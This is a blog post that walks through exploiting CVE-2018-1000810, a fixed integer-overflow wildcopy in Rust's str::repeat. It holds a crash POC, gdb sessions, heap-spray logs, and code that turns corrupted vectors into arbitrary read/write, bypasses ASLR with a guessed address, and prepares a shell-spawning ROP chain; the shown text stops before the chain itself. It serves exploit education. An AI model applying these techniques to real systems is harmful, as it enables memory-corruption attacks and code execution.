I’m a strong believer that in today’s world there’s nothing you can do to stop exploitation once an attacker has relative/arbitrary read/write primitives, and I believe that given a memory corruption, it’s (almost) always possible to construct these primitives. From time to time I like to look at vulnerabilities that seem difficult to exploit at first glance and try to exploit them in the most reliable way (100%).
In this blog post we’re going to go through a quick analysis and a full exploit of CVE-2018-1000810, a vulnerability in the standard library of Rust found by Scott McMurray. We’ll understand the root cause of the vulnerability, how to trigger it, and construct a set of strong primitives using it.
A quick note: Rust is an amazing language, and I really recommend it for developing applications that need to be secure. This vulnerability is already fixed in recent versions. Never take a single vulnerability as an indication of overall security. I’m writing about this vulnerability because I like the language and the bug and I’m curious to learn more.
The vulnerability is a 64bit wildcopy. I had a chance to exploit a different wildcopy in WSL, so if you’re interested in more wildcopies or just want a quick introduction to the concept before reading this blog post, you can watch my talk “Linux Vulnerabilities, Windows Exploits”. It’s another good example of how to reliably exploit a wildcopy in kernelspace. For this Rust vulnerability, we’re going to talk about userspace, and we’re going to get to a very simple && stable wildcopy exploit. We’ll write a simple Rust program that exploits the vulnerability and executes native code “without cheating”, meaning:
No “unsafe” blocks, which allow running native code by design
The only standard library items we import are thread, time and sync::mpsc::channel (i.e. the only 2 lines with “use” are use std::{thread, time}; and use std::sync::mpsc::channel;)
I developed the exploit on Ubuntu 19.10. This should work on other versions of Ubuntu. I also tested it on WSL v1/v2 and Debian 10. Works 100% :)
I tweeted a short POC for this vulnerability a couple of weeks ago, but I didn’t share the analysis of the crash itself and how we got there. Let’s get our hands dirty.
On Sep 21, 2018, the advisory for the vulnerability was published. It was fixed in this pull request, and the discussion about it explains that the bug was introduced in version 1.26.0 and fixed after version 1.29.0. All stable releases between these versions are affected, so I’m going to use Rust 1.29.0 for this blog post.
We’ll start with the following code:
fn main() { let _s = "AAAA".repeat(0x4000000000000001); }
If we compile it with Rust compiler 1.29.0, we can clearly see the multiplication in the function repeat:
We can control the 2 operands of the imul instruction! Now if we run this program:
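To make the overflow concrete, here is a minimal sketch of the arithmetic behind that multiplication. The helper name wrapped_capacity is mine, not something from the standard library; it only models an unchecked len * n on a 64-bit target.

```rust
/// Hypothetical helper: models an unchecked `len * n` on a 64-bit target.
fn wrapped_capacity(len: u64, n: u64) -> u64 {
    len.wrapping_mul(n)
}

fn main() {
    let len = "AAAA".len() as u64; // 4 bytes
    let n: u64 = 0x4000000000000001;

    // 4 * 0x4000000000000001 = 2^64 + 4, which wraps around to 4.
    println!("wrapped capacity = {:#x}", wrapped_capacity(len, n));

    // A checked multiplication reports the overflow instead of wrapping.
    println!("checked_mul = {:?}", len.checked_mul(n));
}
```

The same happens with 0xc000000000000001: the product is 3 * 2^64 + 4, which also wraps to 4, so the buffer is tiny while the copy loop still runs for the full repeat count.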
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cat src/main.rs
fn main() {
let _s = "AAAA".repeat(0xc000000000000001);
}
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ rustc --version
rustc 1.29.0 (aa3ca1994 2018-09-11)
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
Finished dev [unoptimized + debuginfo] target(s) in 2.92s
Running `target/debug/exploit`
Segmentation fault (core dumped)
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
We hit a segfault! This is strange in Rust, because it is not a Rust panic, which is what happens when a runtime safety check detects a problem and stops the program in a controlled way. Here is why it crashes:
(gdb) start
Temporary breakpoint 1 at 0x6072: file src/main.rs, line 2.
Starting program: /mnt/c/projects/rust/exploit/target/debug/exploit
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, exploit::main () at src/main.rs:2
2 let _s = "AAAA".repeat(0xc000000000000001);
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:249
249 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
(gdb) x/8i $rip
=> 0x7ffffe92eb1f <__memmove_avx_unaligned_erms+79>: rep movsb %ds:(%rsi),%es:(%rdi)
0x7ffffe92eb21 <__memmove_avx_unaligned_erms+81>: retq
0x7ffffe92eb22 <__memmove_avx_unaligned_erms+82>: cmp $0x10,%dl
0x7ffffe92eb25 <__memmove_avx_unaligned_erms+85>: jae 0x7ffffe92eb3e <__memmove_avx_unaligned_erms+110>
0x7ffffe92eb27 <__memmove_avx_unaligned_erms+87>: cmp $0x8,%dl
0x7ffffe92eb2a <__memmove_avx_unaligned_erms+90>: jae 0x7ffffe92eb53 <__memmove_avx_unaligned_erms+131>
0x7ffffe92eb2c <__memmove_avx_unaligned_erms+92>: cmp $0x4,%dl
0x7ffffe92eb2f <__memmove_avx_unaligned_erms+95>: jae 0x7ffffe92eb64 <__memmove_avx_unaligned_erms+148>
(gdb) x/8gx $rsi
0x7ffffe400000: 0x4141414141414141 0x4141414141414141
0x7ffffe400010: 0x4141414141414141 0x4141414141414141
0x7ffffe400020: 0x4141414141414141 0x4141414141414141
0x7ffffe400030: 0x4141414141414141 0x4141414141414141
(gdb) x/8gx $rdi
0x7ffffe600000: Cannot access memory at address 0x7ffffe600000
(gdb)
The first segfault of the minimal POC here is because of a similar issue I showed when I developed the WSL exploit (only this time in userspace, not in kernelspace). We are dealing with a wildcopy, so with extremely high probability the program will crash when the loop reaches an unmapped page, trying to copy data in there. That’s the classic segfault I expect after triggering a wildcopy vulnerability.
Great, we can trigger the wildcopy. The fun is only beginning: this is a 64-bit wildcopy, not a 32-bit one. When we exploit such a memory corruption vulnerability, we need to ask ourselves a few important questions:
Can we control (even partially) the content of the data we are corrupting with?
Can we control the length of the data we are corrupting with?
And this time, it’s also important to ask another question:
Can we control the size of the chunk we are corrupting from?
This last question is important because with jemalloc/LFH (or any bucket-based allocator), if we can’t control the size of the chunk we are corrupting from, it might be difficult to shape the heap such that we can corrupt a specific target structure, if that structure has a significantly different size.
At first glance, it seems clear that the answer to the first question, about our ability to control the content, is “yes”. We are taking a string and repeating it, so I (wrongly) assumed that I would be able to use any byte value I want, except maybe for “\x00” (classic C string exploitation problems). After starting to implement the exploit, I got a compilation error because of the following check:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
error: this form of character escape may only be used with characters in the range [\x00-\x7f]
--> src/main.rs:2:21
|
2 | let _s = "\x7f\xff\xff\xff".repeat(0xc000000000000001);
| ^^
error: aborting due to previous error
error: Could not compile `exploit`.
To learn more, run the command again with --verbose.
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
Rust won’t let us have non-UTF-8 data in a String instance. At all. So, we have to corrupt with bytes in the range [0x00, 0x7f] (disclaimer – Unicode characters actually let us reach the upper half of the range as well. See the note at the end). That’s a bit annoying, but it’s absolutely workable. It would be much more painful to exploit this in kernelspace (it would be hard to fake pointers using only this range), but we are in userspace, where many pointers can be represented using this range, no problem.
Now, moving on to the second question – controlling the length of the data we corrupt with. The answer here is (clearly) a big NO. Well, not directly. To trigger the vulnerability we have to specify a size larger than 2**64 bytes, but in practice we might be able to stop the wildcopy somehow. We have a number of options here:
Relying on a race condition – while the wildcopy corrupts some useful target structures or memory, we can race a different thread to use that now corrupted data to do something before the wildcopy crashes (e.g., construct other primitives, terminate the wildcopy, etc.).
If the wildcopy loop has a call to a virtual function on every iteration, and that pointer to a function is in a structure in heap memory (or at other memory address we can corrupt during the wildcopy), the exploit can use the loop to overwrite and divert execution during the wildcopy. A good example of this approach is how some of the Stagefright exploits work in Android.
If the wildcopy loop has some logic that can stop the loop under certain conditions, we can mess with these checks and stop after it corrupted enough data. This is exactly that approach I took for exploiting the WSL vulnerability I mentioned before.
Sadly, the last 2 options aren’t applicable here. Check out the loop logic where the copy occurs in our case:
No checks, no branches, no way out. So… context switches for the win! We will go with option #1.
The answer to the 3rd question, about the size of the chunk we corrupt from, is trivial. We can control it. The calculation for the size of the overwrite is:
length_of_string * repeat_arg
If, for instance, we want the size of the chunk to be 0x100, we can use the following:
"AAAA".repeat(0x4000000000000000+0x100/4);
This call will cause the Rust runtime to allocate 0x100 bytes and then write 2**64+0x100 bytes into it.
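As a sanity check on that formula, here is a small sketch that derives the repeat count for a given chunk size and confirms what the wrapped multiplication leaves behind. The helper repeat_count_for is a name I made up for illustration, and it assumes a 64-bit target and a pattern whose length is a power of two.

```rust
/// Hypothetical helper: picks a repeat count so that `pattern_len * count`
/// wraps around 2^64 and leaves `chunk_size` as the allocation size.
/// Assumes a 64-bit target, a power-of-two `pattern_len` greater than 1,
/// and a `chunk_size` that is a multiple of `pattern_len`.
fn repeat_count_for(pattern_len: u64, chunk_size: u64) -> u64 {
    assert!(pattern_len.is_power_of_two() && pattern_len > 1);
    assert_eq!(chunk_size % pattern_len, 0);
    // The count at which the product reaches exactly 2^64.
    let wrap_once = (1u128 << 64) / pattern_len as u128;
    (wrap_once as u64) + chunk_size / pattern_len
}

fn main() {
    let count = repeat_count_for(4, 0x100);
    println!("repeat count     = {:#x}", count);
    // What an unchecked 64-bit multiplication would compute as the size.
    println!("allocation size  = {:#x}", 4u64.wrapping_mul(count));
}
```

For a 4-byte pattern and a 0x100-byte chunk this gives 0x4000000000000040, the same value as 0x4000000000000000+0x100/4 above.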
This one is easy in our case. We can spray vectors, strings, etc., whose allocation sizes we control (for example using Vec::with_capacity()). One useful fact about jemalloc here is that for huge allocations, the allocator hands out chunks from top to bottom:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Finished dev [unoptimized + debuginfo] target(s) in 0.01s
Running `target/debug/exploit`
thread 0x1: allocate chunk @ 0x7f7a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f7039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f6039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f5039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f4039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3939200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3839200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3739200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3639200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3539200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3439200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3339200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3239200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3139200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f3039200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2f39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2e39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2d39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2c39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2b39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2a39200000, size 0x100000000
thread 0x1: allocate chunk @ 0x7f2939200000, size 0x100000000
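A log like the one above can be produced with a few lines of safe Rust. The following is only a sketch: the spray helper and its scaled-down sizes are my own choices, not the code from the exploit, and where the buffers land depends entirely on the allocator in use (newer Rust toolchains default to the system allocator rather than jemalloc, so the top-to-bottom pattern is not guaranteed).

```rust
/// Hypothetical spray helper: reserves `count` buffers of `size` bytes each
/// and returns them so that they stay alive.
fn spray(count: usize, size: usize) -> Vec<Vec<u8>> {
    let mut allocs = Vec::with_capacity(count);
    for _ in 0..count {
        // with_capacity reserves the backing buffer without writing to it.
        let buf: Vec<u8> = Vec::with_capacity(size);
        println!("allocate chunk @ {:p}, size {:#x}", buf.as_ptr(), buf.capacity());
        allocs.push(buf);
    }
    allocs
}

fn main() {
    // Sizes are scaled down from the log above to keep the sketch cheap.
    let allocs = spray(8, 0x600000);
    println!("sprayed {} buffers", allocs.len());
}
```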
Let’s start with a simple but very important step. Getting the segfault in memcpy when it hits an unmapped page is pretty much useless in our case. We want to get to a memory read or write, to a jump, or anything else that we can work with. I’m going for an arbitrary read/write primitive here, and for that, we’ll target the structure std::Vec. In many languages vectors are a useful tool for exploits, because once corrupted they are basically a memory read/write interface. They usually have a length field and a raw pointer, and their standard interface reads or writes arbitrary values at the address held in that pointer. Here’s how an item is written into a Rust vector, based on the implementation in the Rust source:
pub fn insert(&mut self, index: usize, element: T) {
    let len = self.len();
    assert!(index <= len);
    // space for the new element
    if len == self.buf.capacity() {
        self.reserve(1);
    }
    unsafe {
        // infallible
        // The spot to put the new value
        {
            let p = self.as_mut_ptr().add(index);
            // Shift everything over to make space. (Duplicating the
            // `index`th element into two consecutive places.)
            ptr::copy(p, p.offset(1), len - index);
            // Write it in, overwriting the first copy of the `index`th
            // element.
            ptr::write(p, element);
        }
        self.set_len(len + 1);
    }
}
ptr::write and ptr::read are also used by the other interfaces of the collection, such as push() and pop(), and by any other API that writes to the vector. The API lets us control the value we’re writing, so if we have a way to control the pointer, we have an arbitrary write. In a similar way we can get to an arbitrary read.
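To see why a vector makes such a good target, it helps to look at what its handle contains. The sketch below uses only safe, stable APIs; the helper element_addr is a name I introduce for illustration. It shows that a Vec handle is three machine words (pointer, capacity, length; the field order is not guaranteed by the language) and that an element’s address is derived directly from the stored pointer.

```rust
use std::mem::size_of;

/// Hypothetical helper: the address indexing resolves to, derived from the
/// buffer pointer stored in the vector handle.
fn element_addr(v: &[u64], index: usize) -> usize {
    v.as_ptr() as usize + index * size_of::<u64>()
}

fn main() {
    let v: Vec<u64> = vec![0x1111, 0x2222, 0x3333];

    // The handle itself: pointer + capacity + length.
    println!("size_of::<Vec<u64>>() = {} bytes", size_of::<Vec<u64>>());
    println!("ptr = {:p}, len = {}, cap = {}", v.as_ptr(), v.len(), v.capacity());

    // v[i] lives at ptr + i * size_of::<u64>(), after a bounds check against len.
    println!("&v[2] = {:p}, computed = {:#x}", &v[2], element_addr(&v, 2));
}
```

If the pointer and length words are overwritten, every later index operation computes its address from the attacker’s values, and that is the whole primitive.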
So, let’s try to do the following:
Spray an interesting structure (std::Vec) and shape the heap such that the vulnerable allocation will be allocated in memory before the target structures
Trigger the vulnerability in another thread
Find a corrupted vector, and use that vector in an interesting way (just read or write to it)
The only problem with this approach is that the wildcopy thread almost always wins. I tried to create lots of threads, each of which sprays lots of vectors and uses them. After some trivial shaping I got an arbitrary write (a crash in core::ptr::write with the repeated value from the wildcopy), but it was too unstable for my taste (it works only ~50% of the time). We need to step up our game. Bear with me, at the end the exploit will be 100% stable.
One way to handle that is to try and create a very large mapped area after the chunk we are corrupting from, and hopefully execute code before the copy loop gets past it. So, let’s do the following:
Exploit thread: spray 10000 vectors, each of size 0x600000 (arbitrarily chosen, just needs to be large enough).
Vulnerability thread: trigger the vulnerability, wildcopy from a vector of size 0x600000
Exploit thread: repeatedly scan the vectors, looking for one with a corrupted length and pointer
Since jemalloc allocates large sizes from top to bottom, we end up corrupting all of our vectors (or at least most of them, depending on whether we have large holes in the heap). After the spray is done, we can walk through the vectors and see if one got its size changed:
let mut corrupted_vec = 0;
println!("[*scan*]\tstart checking vectors");
for i in 0..count {
    if allocs[i][0].len() > 1 {
        println!("[*scan*]\tvec corrupted! allocs[{}][0].len() == {:#x}", i, allocs[i][0].len());
        corrupted_vec = i;
        break;
    }
}
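The scan loop can be packaged as a small standalone function. This is a sketch under my own assumptions: find_corrupted is a hypothetical name, the nested Vec<Vec<Vec<u64>>> shape is inferred from the allocs[i][0].len() expression, and the “corruption” is simulated with an ordinary push, since on a fixed toolchain nothing will overwrite the header for us.

```rust
/// Hypothetical scan helper. `allocs[i][0]` is expected to hold exactly one
/// element, so any larger length means its header was overwritten.
fn find_corrupted(allocs: &[Vec<Vec<u64>>]) -> Option<usize> {
    allocs.iter().position(|outer| outer[0].len() > 1)
}

fn main() {
    // Three sprayed slots, each holding a single one-element inner vector.
    let mut allocs: Vec<Vec<Vec<u64>>> = (0..3).map(|_| vec![vec![0u64]]).collect();
    println!("before: {:?}", find_corrupted(&allocs));

    // Stand-in for the wildcopy: change a length the legitimate way.
    allocs[1][0].push(0x41);
    println!("after:  {:?}", find_corrupted(&allocs));
}
```

Returning an Option also removes the ambiguity of using 0 both as “nothing found” and as a valid index.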
And if we simply trigger the wildcopy with the string “AAAA” and then try to write any value we like (say, 0x9090909090909090) through the corrupted vector, sure enough, we get:
Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f4a7cdf0700 (LWP 8807)]
0x00007f4a7e408d19 in exploit::do_arbitrary_write (allocs=0x7f4a7cdef680, count=10000, target_vec=1725, second_target_vec=6299648, addr=139640115757568, value=29400045130965551)
at src/main.rs:21
21 allocs[i][0][0] = 0x9090909090909090;
(gdb) x/2i $rip
=> 0x7f4a7e408d19 <exploit::do_arbitrary_write+409>: mov %rax,(%rcx)
0x7f4a7e408d1c <exploit::do_arbitrary_write+412>: jmpq 0x7f4a7e408c50 <exploit::do_arbitrary_write+208>
(gdb) i r rcx
rcx 0x4141414141414141 4702111234474983745
(gdb) i r rax
rax 0x9090909090909090 -8029759185026510704
(gdb)
Great, we have an arbitrary write primitive out of the wildcopy! Now, let’s consider our situation and our options. We want to be able to read and write memory multiple times, at different addresses. Using the [] indexing operator we can already do that. All we need is to corrupt the raw pointer in the vector structure with some address (NULL or some arbitrary value) and set its length to 0xffffffffffffffff. Then we can read/write relative to this fixed address, which covers the entire address space (and is thus arbitrary). That’s a classic way to exploit this (also in other languages such as JS), and it works great. However, there are a few things we need to worry about in this case: the address and length fields of the vector can’t contain bytes in the range [0x80, 0xff], and we need to cause an integer overflow in multiplications to reach the entire address space, due to the way std::Vec and slices are implemented. It seems possible, but a more intuitive way for me is to use two vectors instead of one and avoid these problems.
We will use one vector, the one corrupted by the wildcopy, as an interface for writing to a single address. That address will hold another vector, which should be easy to arrange with heap shaping. If we assign a value at index 0 of the first vector, we actually corrupt the raw pointer of the second vector. Once we do this, we control the absolute address the second vector points to. Then we can assign a value at index 0 of the second vector, and that value is written at the address we picked before. We can repeat this process as many times as we want, for as many arbitrary reads and writes as we want, at any address in memory. To do that, we’ll do the following:
Spray lots of vectors
Wildcopy with a known mapped address
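The two-vector idea is easier to follow as a toy model. The sketch below does not touch real memory: Memory is a made-up map of 8-byte words, and arbitrary_write is a hypothetical function that only mirrors the two stages described above (retarget the second vector through the first, then write through the second).

```rust
use std::collections::HashMap;

/// Toy model of process memory: 8-byte words keyed by address.
struct Memory {
    words: HashMap<u64, u64>,
}

impl Memory {
    fn write(&mut self, addr: u64, value: u64) {
        self.words.insert(addr, value);
    }
    fn read(&self, addr: u64) -> u64 {
        *self.words.get(&addr).unwrap_or(&0)
    }
}

/// Hypothetical model of the two-stage write. `second_vec_header` is the
/// address of the second vector's pointer field, which is where the
/// corrupted first vector's data pointer has been aimed.
fn arbitrary_write(mem: &mut Memory, second_vec_header: u64, addr: u64, value: u64) {
    // Stage 1: first_vec[0] = addr, which retargets the second vector.
    mem.write(second_vec_header, addr);
    // Stage 2: second_vec[0] = value, which lands at the chosen address.
    let target = mem.read(second_vec_header);
    mem.write(target, value);
}

fn main() {
    let mut mem = Memory { words: HashMap::new() };
    let header = 0x7f007f7f0000; // assumed location of the second vector's header
    arbitrary_write(&mut mem, header, 0x1000, 0x4848484848484848);
    arbitrary_write(&mut mem, header, 0x2000, 0x4343434343434343);
    println!("{:#x} {:#x}", mem.read(0x1000), mem.read(0x2000));
}
```

The point of the model is that only the first vector’s pointer has to survive the byte-range restriction; the address written in stage 1 is an ordinary u64 and can be anything.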
Now we can keep changing the second vector and use it as an interface for read/write. The only problem – we need a vector allocated at a known address, so we need to know where the heap is. In general, the heap will look like this:
Great, let’s bypass ASLR in jemalloc!
So, we have arbitrary/relative read/write primitives, but we have to rely on some mapped address before triggering the vulnerability (we have to set this address as the value in the wildcopy…). I usually don’t like to spray a lot of objects and guess an address, but it might be a nice approach to start with and see where it gets us. Also, I’m running Ubuntu, which doesn’t have very good heap randomization. On other platforms, it’s very hard to simply spray a lot of objects and guess one address. But in this case, with jemalloc on Ubuntu, spraying tens of MBs is more than enough to reach a range of addresses known in advance. After experimenting with spraying lots of data multiple times, we can see there is a range of addresses we consistently reach. I chose the address 0x7f007f7f0000, since it doesn’t require too many allocations for the allocator to get to, and it doesn’t contain any bytes above 0x7f (otherwise we would have trouble representing it as a UTF-8 string). Combining this spray with the previous POC for an arbitrary write, we can gain a generic arbitrary read/write by repeatedly corrupting the second vector (whose address we leaked using the relative read from the known mapped address) and then using the [] operator to read/write through it. Let’s test it by calling the primitive we built:
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, 0x4343434343434343, 0x4848484848484848);
And see that it will cause:
Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fa070ff0700 (LWP 24521)]
0x00007fa07280ae32 in exploit::do_arbitrary_write (allocs=0x7fa070fef658,
corrupted_vec=9997, target_vec=23076864, target_idx=3148, addr=4846791580151137091,
value=5208492444341520456) at src/main.rs:68
68 allocs[target_idx][0][0] = value;
(gdb) x/2i $rip
=> 0x7fa07280ae32 <exploit::do_arbitrary_write+194>: mov %rcx,(%rax)
0x7fa07280ae35 <exploit::do_arbitrary_write+197>: add $0x78,%rsp
(gdb) i r rax
rax 0x4343434343434343 4846791580151137091
(gdb) i r rcx
rcx 0x4848484848484848 5208492444341520456
(gdb)
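Going back to the choice of 0x7f007f7f0000: the constraint that the address contains no byte above 0x7f can be checked mechanically. The helpers below are a sketch with names of my own choosing; they test an address and, when it passes, build the 8-byte string whose repetition would write that address over and over.

```rust
/// True when every byte of `addr` is in [0x00, 0x7f], so its 8-byte
/// little-endian encoding is plain ASCII and therefore valid UTF-8.
fn is_ascii_only(addr: u64) -> bool {
    addr.to_le_bytes().iter().all(|b| *b <= 0x7f)
}

/// Hypothetical helper: turns an address into the 8-byte string a repeat()
/// call would copy again and again. Returns None when the address contains
/// a byte above 0x7f.
fn address_pattern(addr: u64) -> Option<String> {
    if !is_ascii_only(addr) {
        return None;
    }
    String::from_utf8(addr.to_le_bytes().to_vec()).ok()
}

fn main() {
    for addr in [0x7f007f7f0000u64, 0x7ffffe600000u64].iter() {
        println!("{:#x}: ascii-only = {}", addr, is_ascii_only(*addr));
    }
    let pattern = address_pattern(0x7f007f7f0000).expect("address is ASCII-only");
    println!("pattern bytes = {:02x?}", pattern.as_bytes());
}
```

The second address in the loop is the faulting destination from the first gdb session; it contains 0xfe and 0xff, so it could not be written with an ASCII-only string.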
The only problem here is that when we spray huge vectors, it is likely that the address we guessed contains a part of the data buffer of one of the vectors, not the vector structure itself (which is very small). So this address is simply mapped, but doesn’t contain the structure we want to target. To get over that, we can spray even more vectors, as members of the first ones. Now, we have lots of vector structures on the heap, including at this address, with extremely high probability. So, what do we have so far?
Arbitrary read/write primitives – check
Arbitrary content in a known address – check
Heap address known – check
Now, we just need to run some payload. There are many approaches to consider here. We can try to find good targets for data only attacks (which would be very cool), but I chose the easiest and the quickest one - write a ROP chain on the stack that pops a shell. For that, we need to leak library base addresses, not just the heap’s address. Given our current primitives, it’s quite easy to get there. We have so many options:
In dlmalloc, when we free a chunk, before its header we have absolute pointers to the previous/next chunks in the bins. If it’s the first one, then we have pointers to the bins symbols in libc. Reading them gives us the virtual address of a symbol in libc, from which we can calculate its base address. This is a very useful technique in CTFs. Maybe we could find something similar, based on metadata, with jemalloc.
Find a structure with a vtable and derive the library address from a function pointer
There are many others. Since the point of this exploit is primarily to create a stable read/write primitive from the wildcopy, I feel comfortable with taking advantage of the fact we are writing our own code, and simply use the read primitive to read the actual address of a symbol that’s referenced in our Rust code:
fn get_stack_addr() -> u64 {
    let local_var = String::new();
    let stack_addr = &format!("{:p}", &local_var)[2..];
    return u64::from_str_radix(&stack_addr, 0x10).unwrap();
}
To find the addresses of simple gadgets we can just look for the byte sequences in the .text section around main() with the read primitive we already have. The only symbol we now need for this ROP chain is dlsym. We could resolve it by parsing the ELF headers, but that would make our code messy and it’s unnecessary for the POC. So, we can simply add an extern to import this symbol into our Rust code:
extern {
    fn dlsym(handle: *const u8, symbol: *const u8) -> *const u8;
}
Note that this doesn’t require any unsafe blocks, since we never call the function; we only cast it to u64 as follows:
let dlsym_addr = dlsym as u64;
That way, we can get the stack address and code addresses in our main binary.
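The gadget search mentioned above is a plain byte-pattern scan. Here is a minimal sketch of it over a local byte slice; find_gadget is a hypothetical helper, and the code array is a stand-in for bytes that the real exploit would obtain through its read primitive.

```rust
/// Hypothetical helper: offset of the first occurrence of `pattern` in `code`.
fn find_gadget(code: &[u8], pattern: &[u8]) -> Option<usize> {
    if pattern.is_empty() || pattern.len() > code.len() {
        return None;
    }
    code.windows(pattern.len()).position(|w| w == pattern)
}

fn main() {
    // x86-64 encodings: 0x5f = pop rdi, 0xc3 = ret.
    const POP_RDI_RET: [u8; 2] = [0x5f, 0xc3];

    // Stand-in bytes. 41 5f c3 decodes as `pop r15; ret`, and entering it
    // one byte later yields `pop rdi; ret`.
    let code = [0x48, 0x89, 0xe5, 0x41, 0x5f, 0xc3, 0x90];

    match find_gadget(&code, &POP_RDI_RET) {
        Some(off) => println!("pop rdi; ret at offset {:#x}", off),
        None => println!("gadget not found"),
    }
}
```

An offset found this way is relative to wherever the scan started, which is how offsets relative to main() can be turned into absolute addresses.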
